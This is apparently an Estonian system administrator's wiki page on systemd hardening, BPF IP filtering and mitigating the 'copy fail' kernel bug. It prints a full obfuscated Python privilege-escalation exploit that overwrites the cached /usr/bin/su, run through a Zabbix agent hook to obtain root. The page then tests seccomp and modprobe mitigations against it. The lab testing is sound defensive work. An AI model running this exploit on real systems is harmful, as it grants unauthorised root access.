===LoadCredentials kasutamine===

<pre>
root@dh-minio-01:~# systemctl edit nginx

[Service]
LoadCredential=ssl_key:/etc/ssl/private/nginx.key
LoadCredential=ssl_cert:/etc/ssl/certs/nginx.crt
PrivateTmp=yes
</pre>

===systemd-analyze===

<pre>
kasutaja@ph-minio-01:~$ systemd-analyze --user security nginx-07
NAME DESCRIPTION EXPOSURE
✗ KeyringMode= Service shares key material with other service 0.2
PrivateTmp= Service runs in special boot phase, option is not appropriate
ProtectHome= Service runs in special boot phase, option is not appropriate
ProtectSystem= Service runs in special boot phase, option is not appropriate
RootDirectory=/RootImage= Service runs in special boot phase, option is not appropriate
SupplementaryGroups= Service runs as root, option does not matter
RemoveIPC= Service runs as root, option does not apply
✗ User=/DynamicUser= Service runs as root user 0.4
✗ CapabilityBoundingSet=~CAP_SYS_TIME Service processes may change the system clock 0.2
✗ NoNewPrivileges= Service processes may acquire new privileges 0.2
✓ AmbientCapabilities= Service process does not receive ambient capabilities
✗ PrivateDevices= Service potentially has access to hardware devices 0.2
✗ ProtectClock= Service may write to the hardware clock or system clock 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PACCT Service may use acct() 0.1
✗ CapabilityBoundingSet=~CAP_KILL Service may send UNIX signals to arbitrary processes 0.1
✗ ProtectKernelLogs= Service may read from or write to the kernel log ring buffer 0.2
✗ CapabilityBoundingSet=~CAP_WAKE_ALARM Service may program timers that wake up the system 0.1
✗ CapabilityBoundingSet=~CAP_(DAC_*|FOWNER|IPC_OWNER) Service may override UNIX file/IPC permission checks 0.2
✗ ProtectControlGroups= Service may modify the control group file system 0.2
✗ CapabilityBoundingSet=~CAP_LINUX_IMMUTABLE Service may mark files immutable 0.1
✗ CapabilityBoundingSet=~CAP_IPC_LOCK Service may lock memory into RAM 0.1
✗ ProtectKernelModules= Service may load or read kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_SYS_MODULE Service may load kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_BPF Service may load BPF programs 0.1
✗ CapabilityBoundingSet=~CAP_SYS_TTY_CONFIG Service may issue vhangup() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_BOOT Service may issue reboot() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_CHROOT Service may issue chroot() 0.1
✗ PrivateMounts= Service may install system mounts 0.2
✗ SystemCallArchitectures= Service may execute system calls with all ABIs 0.2
✗ CapabilityBoundingSet=~CAP_BLOCK_SUSPEND Service may establish wake locks 0.1
✗ MemoryDenyWriteExecute= Service may create writable executable memory mappings 0.1
✗ RestrictNamespaces=~user Service may create user namespaces 0.3
✗ RestrictNamespaces=~pid Service may create process namespaces 0.1
✗ RestrictNamespaces=~net Service may create network namespaces 0.1
✗ RestrictNamespaces=~uts Service may create hostname namespaces 0.1
✗ RestrictNamespaces=~mnt Service may create file system namespaces 0.1
✗ CapabilityBoundingSet=~CAP_LEASE Service may create file leases 0.1
✗ CapabilityBoundingSet=~CAP_MKNOD Service may create device nodes 0.1
✗ RestrictNamespaces=~cgroup Service may create cgroup namespaces 0.1
✗ RestrictSUIDSGID= Service may create SUID/SGID files 0.2
✗ RestrictNamespaces=~ipc Service may create IPC namespaces 0.1
✗ ProtectHostname= Service may change system host/domainname 0.1
✗ CapabilityBoundingSet=~CAP_(CHOWN|FSETID|SETFCAP) Service may change file ownership/access mode/capabilities unrestricted 0.2
✗ CapabilityBoundingSet=~CAP_SET(UID|GID|PCAP) Service may change UID/GID identities/capabilities 0.3
✗ LockPersonality= Service may change ABI personality 0.1
✗ ProtectKernelTunables= Service may alter kernel tunables 0.2
✗ RestrictAddressFamilies=~AF_PACKET Service may allocate packet sockets 0.2
✗ RestrictAddressFamilies=~AF_NETLINK Service may allocate netlink sockets 0.1
✗ RestrictAddressFamilies=~AF_UNIX Service may allocate local sockets 0.1
✗ RestrictAddressFamilies=~… Service may allocate exotic sockets 0.3
✗ RestrictAddressFamilies=~AF_(INET|INET6) Service may allocate Internet sockets 0.3
✗ CapabilityBoundingSet=~CAP_MAC_* Service may adjust SMACK MAC 0.1
✗ RestrictRealtime= Service may acquire realtime scheduling 0.1
✗ Delegate= Service maintains its own delegated control group subtree 0.1
✗ CapabilityBoundingSet=~CAP_SYS_RAWIO Service has raw I/O access 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PTRACE Service has ptrace() debugging abilities 0.3
✗ CapabilityBoundingSet=~CAP_SYS_(NICE|RESOURCE) Service has privileges to change resource use parameters 0.1
✗ DeviceAllow= Service has no device ACL 0.2
✗ CapabilityBoundingSet=~CAP_NET_ADMIN Service has network configuration privileges 0.2
✗ ProtectProc= Service has full access to process tree (/proc hidepid=) 0.2
✗ ProcSubset= Service has full access to non-process /proc files (/proc subset=) 0.1
✗ CapabilityBoundingSet=~CAP_NET_(BIND_SERVICE|BROADCAST|RAW) Service has elevated networking privileges 0.1
✗ CapabilityBoundingSet=~CAP_AUDIT_* Service has audit subsystem access 0.1
✗ CapabilityBoundingSet=~CAP_SYS_ADMIN Service has administrator privileges 0.3
✗ PrivateNetwork= Service has access to the host's network 0.5
✗ PrivateUsers= Service has access to other users 0.2
✗ CapabilityBoundingSet=~CAP_SYSLOG Service has access to kernel logging 0.1
✗ SystemCallFilter=~@clock Service does not filter system calls 0.2
✗ SystemCallFilter=~@cpu-emulation Service does not filter system calls 0.1
✗ SystemCallFilter=~@debug Service does not filter system calls 0.2
✗ SystemCallFilter=~@module Service does not filter system calls 0.2
✗ SystemCallFilter=~@mount Service does not filter system calls 0.2
✗ SystemCallFilter=~@obsolete Service does not filter system calls 0.1
✗ SystemCallFilter=~@privileged Service does not filter system calls 0.2
✗ SystemCallFilter=~@raw-io Service does not filter system calls 0.2
✗ SystemCallFilter=~@reboot Service does not filter system calls 0.2
✗ SystemCallFilter=~@resources Service does not filter system calls 0.2
✗ SystemCallFilter=~@swap Service does not filter system calls 0.2
✗ IPAddressDeny= Service does not define an IP address allow list 0.2
✗ NotifyAccess= Service child processes may alter service state 0.2
✗ UMask= Files created by service are world-readable by default 0.1

→ Overall exposure level for nginx-07.service: 9.9 UNSAFE 😨
kasutaja@ph-minio-01:~$
</pre>

===bpf integratsioon===

Väited

* nö uuemal ajal on systemd ja bpf integreeritud, nt võrgu paketifiltri osas
* bpf integratsioon on seotud cgroup nähtusega, st kitsenduste tegemisel saab kaustada info võrguaadresside, systemd objektide (slice, service) jms kohta (selles mõttes paindlikum kui niisama iptables/nft kuigi ka seal on iseenesest kasutajaga seostamine olemas)
* bpf ei ole stateful tulemüür, st bpf on stateless (conntrack jms puudub)
* bpf palju suurema jõudlusega kui tava-paketifilter

====Service====

Tavalisse service unitisse lisada Service sektsiooni 'IPAddressAllow' ja 'IPAddressDeny' direktiive, nt (see on küll podmaniga seotud service generated variant)

<pre>
root@ph-minio-01:~# cat .config/containers/systemd/nginx-06.container
[Unit]
Description=My Nginx Quadlet Service - 06
DefaultDependencies=no
After=network.target

[Container]
Image=docker.io/library/nginx:alpine
PublishPort=8096:80
ContainerName=nginx-06

[Service]
# Block all IP traffic by default
IPAddressDeny=any
# Then explicitly allow only what you need (e.g., your local subnet)
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.1
IPAddressAllow=8.8.8.8

[Install]
# This tells systemd to start it when you log in
WantedBy=default.target
</pre>

kus

* ipaddressallow ja deny väärtusi võrreldakse ip pakettide src ja destination aadressidega st piisab kui üks neist klapib

Kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl --user daemon-reload
root@ph-minio-01:~# systemctl --user stop nginx-06
root@ph-minio-01:~# systemctl --user start nginx-06
</pre>

Tulemuse uurimine, väätus id 185 on dünaamiline, õige saab ära vaadata 'bpftool prog show' väljundist

<pre>
root@ph-minio-01:~# bpftool prog show id 185
185: cgroup_skb name sd_fw_egress tag df35b3b526089f21 gpl run_time_ns 1378480 run_cnt 1215
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51

root@ph-minio-01:~# bpftool prog show id 186
186: cgroup_skb name sd_fw_ingress tag 208d1bf35e7113d2 gpl run_time_ns 516780 run_cnt 1204
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51
</pre>

kus

* run_cnt näitab kui mitmel korral on kitsendust rakendatud

ning

<pre>
root@ph-minio-01:~# bpftool map show id 51
51: lpm_trie name 4_nginx_06.serv flags 0x1
key 8B value 8B max_entries 3 memlock 156B
</pre>

ning

<pre>
root@ph-minio-01:~# bpftool map dump id 51
key: 20 00 00 00 08 08 08 08 value: 01 00 00 00 00 00 00 00
key: 20 00 00 00 7f 00 00 01 value: 01 00 00 00 00 00 00 00
key: 18 00 00 00 c0 a8 0a 00 value: 01 00 00 00 00 00 00 00
Found 3 elements
</pre>

sellise skriptiga saab teisendada loetavamaks

<pre>
root@ph-minio-01:~# cat bpftool-map-dump.sh
#!/bin/bash

bpftool map dump id 51 | grep '^key' | while read -r line; do
bytes=($(echo $line | cut -d: -f2))
printf "Prefix: %d | IP: %d.%d.%d.%d\n" "$((16#${bytes[0]}))" "$((16#${bytes[4]}))" "$((16#${bytes[5]}))" "$((16#${bytes[6]}))" "$((16#${bytes[7]}))"
done

root@ph-minio-01:~# ./bpftool-map-dump.sh
Prefix: 32 | IP: 8.8.8.8
Prefix: 32 | IP: 127.0.0.1
Prefix: 24 | IP: 192.168.10.0
</pre>

Tulemusena ei saa konkteinerist välja võrku mujale pöörduda.

====Slice====

<pre>
root@ph-minio-01:~# systemctl edit user.slice

root@ph-minio-01:~# cat /etc/systemd/system/user.slice.d/override.conf
[Slice]
# This is a slice, but we can still pass BPF instructions
IPAddressDeny=any
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.0/8
</pre>

kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl daemon-reload
</pre>

logida välja ja sisse ssh pealt näiteks ning

<pre>
root@ph-minio-01:~# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
^C
--- 8.8.8.8 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1005ms

root@ph-minio-01:~#
</pre>

====Misc====

bpftop esitab ülevaatlikult

[[Fail:20260420-systemd-bpf-01.png|800px]]

===20260501 - copy fail eksploit===

Väited

* küllap kõik see lugu on ajutise iseloomuga praktiliselt, st varsti saabub uus parandatud linux kernel
* pedagoogilises mõttes on see huvitav lugu
* vahetulemusi on huvitav pasteda chatgpt'le ja küsida selgitusi

====Tööpõhimõte - af_alg====

af_alg on omaette 'address family' nagu af_unix (nn unix soket), af_inet (tavaline internet), af_netlink, af_xdp jt. Tema kaudu saab eksootilisem tarkvara kasutada riistvara lähedast krüptimist, nt (kcapi - kernel crypto api)

<pre>
root@pwrk-02:/home/imre/20260430# apt-get install kcapi-tools

imre@pwrk-02:/home/imre/20260430$ date > cleartext.txt

imre@pwrk-02:/home/imre/20260430$ kcapi-enc -e -c "cbc(aes)" --passwd "MyPassword123" --iv $(openssl rand -hex 12) < cleartext.txt > encrypted.bin
kcapi-enc - Warning: Password on command line is visible in process listing and /proc! Use --passwd_fd command line option!
kcapi-enc - Warning: PBKDF2 iterations used: 131072
kcapi-enc - Warning: PBKDF2 salt used: 245b53106bb1d0cf09700fd63161dd0b59601995e368d6410d6e59adbd7e8468
</pre>

kus

* valitud krüpto 'cbc(aes)' asemel saab olla ka muud, nad kõik toimetavad af_alg soketi kaudu, aga edasi kasutavad erinevaid oskusi, nendega on seotud erinevad täiendavad kerneli moodulid - eksploitimisega on seotud konkreetselt üks - algif_aead

<pre>
imre@pwrk-02:~$ lsmod | grep alg
algif_hash 12288 0
algif_rng 12288 0
algif_skcipher 12288 0
algif_aead 12288 0
af_alg 32768 4 algif_hash,algif_skcipher,algif_aead,algif_rng
</pre>

Nn af_alg funktsionaalsuse kasutamine toimub user-space pealt ja teenindamine toimub kernel-space peal, ja nagu tavaliselt seda nö horisonti ületatakse syscall tehnika abil. syscall'il on tohtu vastutus oma sisendi kontrollimise ja oma tegevuste osas - privilegeerimata actor palub midagi korda saata väga privilegeeritud actoril; mingis mõttes on ta nagu setuid bit või sudo-abil-root-minemine.

====Tööpõhimõte - eksploit====

copy fail eksploit kasutab ära af_alg osakonnas kerneli ümbruses toimuvaid võimalusi, privilegeerimata kaustajal on võimalik kirjutada page cache sisu mingis ulatuses üle. Nt selliselt

* esmalt korraldatakse page cache peale mõni setuid bit sisselülitusega fail, nt 'su' - nt lugedes faili tavalisel viisil satub tema sisu page cache'i
* siis muudetakse sisu sobivalt page cache osakonnas (st arvuti mälus) - see on võimalik tänu eksploidi toimimisele - üldiselt on linux kerneli lubadus selline, et kui protsess (privilegeerimata protsess antud juhul) ei saa failisüsteemis faili muuta, siis ei saa ta tegeleda ka cache'itud vastava faili sisuga)
* käivitatakse muudetud failile vastav programm, kuna fail on juba page cache peal, siis failisüsteemist seda uuesti ei loeta - setuid bit kätega minnakse root shelli
* teoreetiliselt võiks olla võimalik kas vastupidine, st mõnele pahale programmile vastavale failile pannakse külge setuid bit, aga antud juhul ei ole see kõneks - seda oleks ehk raskem teha st sobiv koht cache pealt üles otsida, ja see setuid bit on faili metaandmete koosseisu st asub inode cache peal mitte page cache, ja kõneksolev eksploit sinna ei saa sodima minna
* page cache on üldiselt seotud vfs (virtual filesystem) nähtusega, st sellega, mis on nö ext4 jt failisüsteemide kohal ja protsesside all

Asjaosalised kihid

<pre>
arvutis töötavad protsessid (asuvad arvuti mälus)

|
v

vfs (virtual file system) (asub arvuti mälus)

|
v

page cache (asub arvuti mälus)

|
v

ext4 filesystem (asub plokkseadmel)

|
v

plokkseade (asub nö füüsilisel esemel)
</pre>

kus

* page cache peale tehtud muudatuse saab unustada öeldes '# echo 3 > /proc/sys/vm/drop_caches'
* page cache peale tehtud muudatuse saab põlistada ext4 failisüsteemi öeldes 'sync'
* plokkseadme puhvrid saab madalamale kihile kirjutada põlistada blockdev käsu abil

Üldiselt on syscallidel tohutu vastutus oma sisendit valideerida ja jälgida mida nad edasi teevad, tundub, et antud juhul af_alg teemaga tegelevad syscall'id seda vastutust ei kanna välja st lasevad ennast manipuleerida.

====Tööpõhimõte - leevendus====

Kõige õigem oleks kernel tarkvara parandus ja küllap see varem või hiljem saabub. Seniks on võimalik rakendada ühte- ja teistsugust leevendust (mitigation)

* uskuda, et pahatahtlik kasutaja süsteemis ei tegutse programme kohale tuues ja neid kävitades (nö tavaline veebiserver pigem ei tohiks lubada ette anda koodi mida käivitatakse; tavaline veebiserver käivitab süsteemi haldajate poolt paigaldatud koodi)
* lülitada kerneli tasemal välja af_alg funktsionaalsus (modprobe) - mõju globaalne
* lülitada syscall tulemüüri tasemel välja af_alg funktsionaalsus (nn secure computing ehk seccomp, mis omakorda põhineb bpf tehnikal, vist nn 'Seccomp-BPF', mida ei haldab bpftool (bpftool tegeleb eBPF osakonnaga nähtustega) - mõju protsessile (ja tema järglastele, või systemd service unitiga seotud protsessidele)

Kerneli tasemel välja lülitamine eeldab praktiliselt, et af_alg funktsionaalsus on realiseeritud tuuma moodulite abil (ei ole otse nn /boot/vmlinuz kerneli sisse kompileeritud). Tavaliselt on modulaarne. Mõju on globaalne.

syscall tulemüüri tasemel välja lülitamine on paindlik - saab (peab st muul viisil ei saagi praktiliselt st globaalselt ei saa (kuigi teoreetiliselt saaks init=pid=1 protsessile ka seccomp abil kitsendusi rakendada, aga tavaliselt nii ei tehta) erinevate protsesside (protsesside komplektide) jaoks muudatust kehtestada. Seejuures saab määrata, mis keeldu ületada püüdva protsessiga edasi juhtub: 1. ta töötab edasi, 2. ta töötamine lõpetatakse

====Eksploit näide====

https://copy.fail/ - tõenäoliselt on see nö puhas eksploit, st midagi suurelt temaga katsetamine ussitama ei aja st vaevalt ta interneti isandale sama arvuti /root/.ssh sisu saadab, aga kuna ta page cache sobib ja vaevalt, et seda exploiti on liiga palju testitud ja arendatud, siis ei ole võimatu ext4 failisüsteemi riknemine, arvutis töötavate protsesside segadusse sattumine kuni os krahhini; st proovida ehk maksab, aga arvutis, mis pärast kustutatakse

<pre>
$ cat /home/tmp/cf.py
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

$ chmod 0755 /home/tmp/cf.py
</pre>

zabbix agent kaudu

<pre>
root@pwrk-02:~# cat /etc/zabbix/zabbix_agent2.d/misc.conf
UserParameter=cf,echo id | /home/tmp/cf.py 1>>/home/tmp/cf.log 2>&1
</pre>

käivitamine

<pre>
root@pwrk-02:~# zabbix_get -k cf -s 127.0.0.1

root@pwrk-02:~#
</pre>

logi

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
..
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
...
</pre>

page cache puhastamine ("3" kasutamine nö puhastab kõik, inode cache, page cache jne, põhimõtteliselt sobiks ka "1")

<pre>
root@pwrk-02:~# echo 3 > /proc/sys/vm/drop_caches
</pre>

katsetamisel võib olla vajalik vahel jällegi moodulid välja lülitada, nt

<pre>
root@pwrk-02:~# rmmod algif_rng algif_aead algif_skcipher algif_hash af_alg
</pre>

====Leevendus - systemd service====

Väited

* mõju on service põhine
* praktiliselt võiks rakendada avalikku võrku publitseeritud teenuste (protsesside) jaoks mille kaudu võiks olla selline python skript laadse sisu käivitamine (mingit tüüpi exec syscall rakendamine) realistlik
* öeldakse, et kasutame systemd võimalusi, tehniliselt kasutatakse linux kerneli secure compute võimalusi (seccomp)
* kehtestamiseks tuleb systemd service stop ja start öelda

systemd service unit muudatus, enne (zabbix-agent protsessi pid on 174841)

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~

root@pwrk-02:/home/imre/20260430# cat /proc/174841/status | grep -i secco
Seccomp: 0
Seccomp_filters: 0
</pre>

muudatus

<pre>
# root@pwrk-02:~# systemctl edit zabbix-agent2
[Service]
RestrictAddressFamilies=~AF_ALG
# SystemCallErrorNumber=kill
# SystemCallErrorNumber=EPERM
</pre>

kus

* RestrictAddressFamilies=~AF_ALG konstruktsioon väljendab eitust st kõik protokollid on lubatud v.a. AF_ALG
* SystemCallErrorNumber kontrollib, mis rikkumist proovinud protsessiga edasi saab

peale muudatust

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~AF_ALG

root@pwrk-02:/home/imre/20260430# cat /proc/174842/status | grep -i secco
Seccomp: 2
Seccomp_filters: 2
</pre>

Eksploit kasutamine annab nüüd sellise tulemuse

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
...
Traceback (most recent call last):
File "/home/tmp/cf.py", line 9, in <module>
while i<len(e):c(f,i,e[i:i+4]);i+=4
^^^^^^^^^^^^^^^
File "/home/tmp/cf.py", line 5, in c
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
^^^^^^^^^^^^^^^^
File "/usr/lib/python3.12/socket.py", line 233, in __init__
_socket.socket.__init__(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol
</pre>

====Leevendus - apparmor profile====

TODO

====Leevendus - modprobe====

Väited

* mõju on globaalne süsteemile - võib olla on see liiga suure mõjuga st arvuti juures midagi siiski vajab af_alg

<pre>
# cat /etc/modprobe.d/mitigate-copy-fail.conf
install algif_aead /bin/true
</pre>

kus

* 'install algif_aead' element ütleb, et kui toimub algif_aead mooduli laadimise attampt, siis hoopis täita järgnev käsk - '/bin/true' (mingi teooria kohaselt on /bin/true kasutamine sobivam kui /bin/false kuna vea saamisel võiks süsteem proovida veelkorra moodulit laadida jne)
* selle käsu andmisel tehniliselt ollakse õnnelik iseensest kuigi sisuliselt midagi ei muutu
* muudatus kehtestub koheselt

ning parem oleks ehk ka initramfs uuesti tekitada

<pre>
root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep alg
usr/lib/modules/6.8.0-110-generic/kernel/crypto/af_alg.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_aead.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_hash.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_rng.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_skcipher.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos/i2c-algo-bit.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/net/xfrm/xfrm_algo.ko.zst
</pre>

ja

<pre>
root@pwrk-02:~# update-initramfs -u
update-initramfs: Generating /boot/initrd.img-6.8.0-110-generic
I: The initramfs will attempt to resume from /dev/dm-2
I: (/dev/mapper/system-swap)
I: Set the RESUME variable to override this.

root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep 'etc/modprobe.d'
etc/modprobe.d
etc/modprobe.d/amd64-microcode-blacklist.conf
etc/modprobe.d/blacklist-ath_pci.conf
etc/modprobe.d/blacklist-firewire.conf
etc/modprobe.d/blacklist-framebuffer.conf
etc/modprobe.d/blacklist-rare-network.conf
etc/modprobe.d/blacklist.conf
etc/modprobe.d/dkms.conf
etc/modprobe.d/intel-microcode-blacklist.conf
etc/modprobe.d/iwlwifi.conf
etc/modprobe.d/mdadm.conf
etc/modprobe.d/mitigate-copy-fail.conf
root@pwrk-02:~#
</pre>

====Misc - docker rootful====

docker rootful puhul tuleb muuta kahte service'it - kuna child protsessid pärivad vanematelt seccomp jms omadused, siis mõju on tõhus

* docker
* containerd

====Debian====

20260501 ilmus Debian operatsioonisüsteemile parandatud tuum

[[Fail:20260502-debian-copy-fail-01.png|1000px]]

kus

* https://www.debian.org/security/
* https://security-tracker.debian.org/tracker/source-package/linux
* muudatusi saab otsida globaalse CVE nime abil (nt CVE-2026-31431)

====Ubuntu====

20260501 ilmus Ubuntu operatsioonisüsteemile parandatud kmod pakett

[[Fail:20260502-ubuntu-copy-fail-01.png|1000px]]

kus

* kmod paketis sisaldub fail etc/modprobe.d/disable-algif_aead.conf

<pre>
root@pwrk-02:~/20260502# cat etc/modprobe.d/disable-algif_aead.conf
# Disable algif_aead module due to CVE-2026-31431 (AKA copy.fail)
# This will likely be re-enabled in a subsequent update once an updated
# kernel has been deployed.
# Blacklisting the module isn't sufficient, we need to do as below:
install algif_aead /bin/false
</pre>

* küllap parandatud tuum ilmub seejärel

====Proxmox====

20260501 on ilmunud no-subscription repodesse v. 7 tuum, seda see 'copy fail' haavatavus ei puuduta

<pre>
root@pve-svc-02:~# uname -a
Linux pve-svc-02 7.0.0-3-pve #1 SMP PREEMPT_DYNAMIC PMX 7.0.0-3 (2026-04-21T22:56Z) x86_64 GNU/Linux
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-configure-systemd-service-hardening-on-ubuntu/view
* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* [[:Systemd-nspawn kasutamine operatsioonisüsteemiga Debian]]
* http://en.wikipedia.org/wiki/Systemd
* http://blog.exppad.com/article/a-docker-like-container-management-using-systemd
* http://0pointer.net/blog/projects/systemd-for-admins-1.html
* http://zero-knowledge.org/post/92
* http://0pointer.de/public/systemd-ebook-psankar.pdf
* http://ktaraghi.blogspot.com/2013/11/what-is-systemd-and-how-it-works-part-1.html

Systemd kasutamine

2026-05-02T10:06:53Z

Imre: /* Tööpõhimõte - eksploit */

===Sissejuhatus===

systemd http://freedesktop.org/wiki/Software/systemd/ ...

Tundub, et 2014 aasta lõpus on Debian v. 8 Jessie koosseisus vaikimisi systemd

# ls -ld /sbin/init
lrwxrwxrwx 1 root root 20 Sep 28 22:33 /sbin/init -> /lib/systemd/systemd

===Tööpõhimõte===

* Turvalisus ja tegevuste isoleerimine failisüsteemi ja võrgu tasemel, http://0pointer.de/blog/projects/security.html
* SysV käivitusskripti on imperatiivsed, st shell skriptid praktiliselt, systemd nö käivitusskriptid on deklaratiivsed, st nn .ini failidele sarnase sisuga

===Paigaldamine===

Tundub, et minimaalsele keskkonnale (nt debootstrap abil moodustatud) tuleb juurde lisada dbus ja polkit tugi, vastasel korral nt systemd-cgls programm ei tööta)

# apt-get install dbus libpolkit-agent-1-0

===Kasutamine===

Teenuse oleku küsimiseks sobib öelda

# systemctl status ssh.service
● ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
Active: active (running) since Tue 2014-11-04 02:43:10 EET; 18h ago
Main PID: 1956 (sshd)
CGroup: /system.slice/ssh.service
└─1956 /usr/sbin/sshd -D

kus

# cat /lib/systemd/system/ssh.service
[Unit]
Description=OpenBSD Secure Shell server
After=network.target auditd.service
ConditionPathExists=!/etc/ssh/sshd_not_to_be_run

[Service]
EnvironmentFile=-/etc/default/ssh
ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
Restart=on-failure

[Install]
WantedBy=multi-user.target
Alias=sshd.service

Teenuste nimekirja esitamiseks

# systemctl list-units --type=service | head -n 5
UNIT LOAD ACTIVE SUB DESCRIPTION
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active exited LSB: Start the Advanced Configuration and Power Interface daemon
amavis-mc.service loaded active exited LSB: Startup script for amavis master supervisor
amavis.service loaded active running LSB: Starts amavisd-new mailfilter

Tundub, et teenus saab olla mitmes olekus, üks variant teenuseid on sellised, mis arvuti käivitamisel nö korraks töötavad midagi sisse lülitades ja siis teevad exit, nt

# systemctl list-units --type=service --state=exited
UNIT LOAD ACTIVE SUB DESCRIPTION
getty-static.service loaded active exited getty on tty2-tty6 if dbus and logind are not available
kbd.service loaded active exited LSB: Prepare console
keymap.service loaded active exited LSB: Set keymap
modules_dep.service loaded active exited LSB: modules.dep creation.
netfilter-persistent.service loaded active exited netfilter persistent configuration
networking.service loaded active exited LSB: Raise network interfaces.
quota.service loaded active exited Check And Enable File System Quotas
rc-local.service loaded active exited /etc/rc.local Compatibility
systemd-random-seed.service loaded active exited Load/Save Random Seed

===systemd-timedated===

timedatectl programmiga saab seadistada ajavööndit jms

# timedatectl list-timezones
# timedatectl set-timezone Europe/Tallinn

systemd-timedated on ntp klient, mis tuleb kasutamiseks sisse lülitada

# timedatectl set-ntp true

Tundub, et samaväärne on öelda

# systemctl enable systemd-timesyncd
# systemctl start systemd-timesyncd

Töötamissel annab timedatactl saranase vastuse

# timedatectl status
Local time: Fri 2015-07-31 01:21:26 EEST
Universal time: Thu 2015-07-30 22:21:26 UTC
RTC time: Thu 2015-07-30 22:21:26
Time zone: Europe/Tallinn (EEST, +0300)
NTP enabled: yes
NTP synchronized: no
RTC in local TZ: no
DST active: yes
Last DST change: DST began at
Sun 2015-03-29 02:59:59 EET
Sun 2015-03-29 04:00:00 EEST
Next DST change: DST ends (the clock jumps one hour backwards) at
Sun 2015-10-25 03:59:59 EEST
Sun 2015-10-25 03:00:00 EET

kus

* valitud ajavööndi Daylight Saving Time algus ja lõpp
* kas NTP teenust töötab (systemd-timesyncd)

Spetsiifilise NTP serveri kasutamiseks sobib näidata ta seadistusfailis /etc/systemd/timesyncd.conf

# cat /etc/systemd/timesyncd.conf
[Time]
Servers=10.192.0.53

ja muudatuse kehtestamiseks öelda

# systemctl restart systemd-timesyncd

Tulemusena

# systemctl status systemd-timesyncd
● systemd-timesyncd.service - Network Time Synchronization
Loaded: loaded (/lib/systemd/system/systemd-timesyncd.service; enabled)
Active: active (running) since Fri 2015-07-31 09:13:18 EEST; 1min 43s ago
Docs: man:systemd-timesyncd.service(8)
Main PID: 1179 (systemd-timesyn)
Status: "Using Time Server 10.192.0.53:123 (10.192.0.53)."
CGroup: /system.slice/systemd-timesyncd.service
└─1179 /lib/systemd/systemd-timesyncd

Jul 31 09:13:17 postkast systemd-timesyncd[1179]: Using NTP server 10.192.0.53:123 (10.192.0.53).
Jul 31 09:13:18 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 32s/+0.621s/0.000s/0.000s/+0ppm
Jul 31 09:13:50 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 64s/+0.000s/0.000s/0.000s/+0ppm
Jul 31 09:14:54 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 128s/-0.000s/0.000s/0.000s/+0ppm

